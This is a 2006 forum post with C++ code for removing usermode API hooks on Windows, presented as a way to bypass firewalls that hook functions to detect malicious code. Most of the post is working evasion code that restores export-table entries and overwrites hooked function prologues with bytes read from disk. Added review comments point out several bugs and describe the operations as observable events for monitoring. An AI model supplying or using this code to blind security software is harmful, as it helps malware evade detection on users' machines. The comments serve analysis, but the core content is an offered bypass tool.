Usermode api hook removal

王朝other·作者佚名  2006-04-26

By: akcom

Firewalls implementing usermode hooks to detect (shock) viral/malicious hooks are both idiotic and easy to bypass; the code to do it follows. This protects against export table patching and extended/simple code overwrites (inline hooking).

// Plain pointer arithmetic: (Typecast)(Base + Increment). Both operands are cast to
// ULONG (32-bit), so pointers are truncated on a 64-bit build; this code is 32-bit only.
#define makeptr( Base, Increment, Typecast ) ((Typecast)( (ULONG)(Base) + (ULONG)(Increment) ))

// Same shape, but Increment is an RVA that is first translated through the section table
// by RVAToVA. Intended for an image that was read from disk with ReadFile (a raw file
// image), where RVAs do not coincide with buffer offsets.
#define incptr( Base, Increment, Typecast ) ((Typecast)RVAToVA( (ULONG)(Base), (ULONG)(Increment) ))

// Translates the RVA `Increment` within the raw file image at `Base` to the address of
// the corresponding bytes in that buffer (falls back to Base + Increment). Defined below.
ULONG RVAToVA( ULONG Base, ULONG Increment );

// Rewrites one named export of an already-loaded module so that it again matches the
// module's file on disk. Two things are done, in order:
//   1. the export's RVA in the live Export Address Table is compared with the RVA stored
//      in the file's export table and, if they differ, the file value is written back;
//   2. the function's leading bytes in memory are compared with the file bytes and copied
//      over, byte by byte, until the first byte that already matches.
// Module:   handle of the loaded module whose export is to be restored.
// Function: export name; matched case-insensitively against the file's name table.
// Returns nothing and reports nothing: no Win32 call below has its result checked, so a
// failed CreateFile/ReadFile/GetProcAddress/VirtualQuery/VirtualProtect simply continues
// with whatever values are in hand. All pointer arithmetic is done via ULONG casts
// (makeptr/incptr), so this is 32-bit only.
// NOTE(review): changing a system module's code page to PAGE_EXECUTE_READWRITE and writing
// into its EAT are the very operations a hook installer performs; for monitoring purposes
// the protection change and the write to module code are the observable events here.
void Unhook( HMODULE Module, LPSTR Function )

{

// Read the module's own file into a private buffer. Base then holds a raw, unrelocated
// copy of the image that serves as the reference for "original" bytes.
char MFileName[MAX_PATH];

GetModuleFileName( Module, MFileName, sizeof(MFileName) );

HANDLE hFile = CreateFile( MFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );

SetFilePointer( hFile, 0, NULL, FILE_BEGIN );

ULONG dwTemp;

dwTemp = GetFileSize( hFile, NULL );

BYTE *Base = new BYTE[dwTemp];

// ReadFile overwrites dwTemp with the number of bytes actually read; the value is not
// used afterwards, so a short read goes unnoticed.
ReadFile( hFile, Base, dwTemp, &dwTemp, NULL );

CloseHandle( hFile );

// Parse the raw image: NT headers via e_lfanew, then DataDirectory[0] (the export
// directory). incptr is used because the buffer is a file image, not a loader-mapped one.
PIMAGE_NT_HEADERS Nt = makeptr( Base, ((PIMAGE_DOS_HEADER)Base)->e_lfanew, PIMAGE_NT_HEADERS );

PIMAGE_EXPORT_DIRECTORY Exports =

incptr( Base, Nt->OptionalHeader.DataDirectory[0].VirtualAddress, PIMAGE_EXPORT_DIRECTORY );

// Address as the live module currently resolves it (i.e. possibly the hooked one).
// NULL if the name is not exported; that case is not checked and faults in the copy loop.
PBYTE FuncHooked = (PBYTE)GetProcAddress( Module, Function );

// Set only when the name is found in the file's export name table below; stays NULL
// otherwise, which also faults in the copy loop.
PBYTE FuncOriginal = NULL;

// Declared char** but the entries are RVAs, hence the incptr on each Names[i] below.
char **Names = incptr( Base, Exports->AddressOfNames, char ** );

ULONG *Functions = incptr( Base, Exports->AddressOfFunctions, ULONG * );

ULONG RVA;

ULONG VA;

// The name index i is used directly as the index into AddressOfFunctions; the
// AddressOfNameOrdinals table is never consulted.
for ( ULONG i = 0; i < Exports->NumberOfNames;i++ )

{

if ( _stricmp( incptr( Base, Names[i], char * ), Function ) == 0 )

{

//protection against export table patching

// RVA recorded in the file's EAT versus the RVA implied by the live GetProcAddress result.
RVA = Functions[i];

VA = (ULONG)GetProcAddress( Module, Function ) - (ULONG)Module;

if ( VA != RVA )

{

// Walk the *loaded* image this time (Module is mapped, so plain makeptr suffices) down
// to its live AddressOfFunctions array, then put the file's RVA back into slot i.
ULONG *EATFunc =

makeptr(

Module,

makeptr(

Module,

makeptr( Module, ((PIMAGE_DOS_HEADER)Module)->e_lfanew, PIMAGE_NT_HEADERS )->OptionalHeader.DataDirectory[0].VirtualAddress,

PIMAGE_EXPORT_DIRECTORY )->AddressOfFunctions,

PULONG

);

EATFunc[i] = RVA;

}

// The function's bytes as stored in the file; the reference copy for the loop below.
FuncOriginal = incptr( Base, Functions[i], PBYTE );

break;

}

}

//protection against extended code overwriting

// Make the region holding the live function writable for the byte copy.
MEMORY_BASIC_INFORMATION Info;

VirtualQuery( FuncHooked, &Info, sizeof(Info) );

ULONG OldProtection;

VirtualProtect( FuncHooked, Info.RegionSize, PAGE_EXECUTE_READWRITE, &OldProtection );

// NOTE(review): i was declared in the for-header above and is out of scope here under
// standard C++; this compiles only with the old MSVC for-scope behaviour.
i = 0;

// Copy file bytes over live bytes until the first position where they already agree. A
// modification that happens to share a byte with the original at some position is thus
// only restored up to that byte. The file bytes are unrelocated; no relocation handling is
// visible, so a relocated value inside the copied range would be reverted to its on-disk
// form — TODO confirm whether the targeted prologues contain any.
while ( FuncHooked[i] != FuncOriginal[i] )

{

FuncHooked[i] = FuncOriginal[i];

i++;

}

delete []Base;

// NOTE(review): VirtualProtect requires a non-NULL lpflOldProtect; with NULL this call
// fails and the region is left PAGE_EXECUTE_READWRITE.
VirtualProtect( FuncHooked, Info.RegionSize, OldProtection, NULL );

}

// Translate an RVA into an address inside a raw file image.
//
// Base      address of a buffer holding the image exactly as read from disk (not
//           loader-mapped), so RVAs must go through the section table first.
// Increment the RVA to translate.
//
// Returns Base + (file offset of Increment) when a section's [VirtualAddress,
// VirtualAddress + SizeOfRawData] range contains Increment; otherwise falls back to
// Base + Increment. Arithmetic is done in ULONG, so only 32-bit addresses are supported.
ULONG RVAToVA( ULONG Base, ULONG Increment )
{
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)Base;
    PIMAGE_NT_HEADERS nt = makeptr( Base, dos->e_lfanew, PIMAGE_NT_HEADERS );
    // Section headers follow the NT headers directly.
    PIMAGE_SECTION_HEADER sect = makeptr( nt, sizeof(*nt), PIMAGE_SECTION_HEADER );
    USHORT count = nt->FileHeader.NumberOfSections;

    for ( USHORT n = 0; n < count; n++, sect++ )
    {
        ULONG start = sect->VirtualAddress;
        ULONG end = start + sect->SizeOfRawData;
        if ( Increment < start || Increment > end )
        {
            continue;
        }
        // Increment lies in this section: rebase it onto the section's raw data.
        return Base + sect->PointerToRawData + (Increment - start);
    }

    // Not covered by any section: treat the RVA as a plain offset.
    return Base + Increment;
}

 
 
 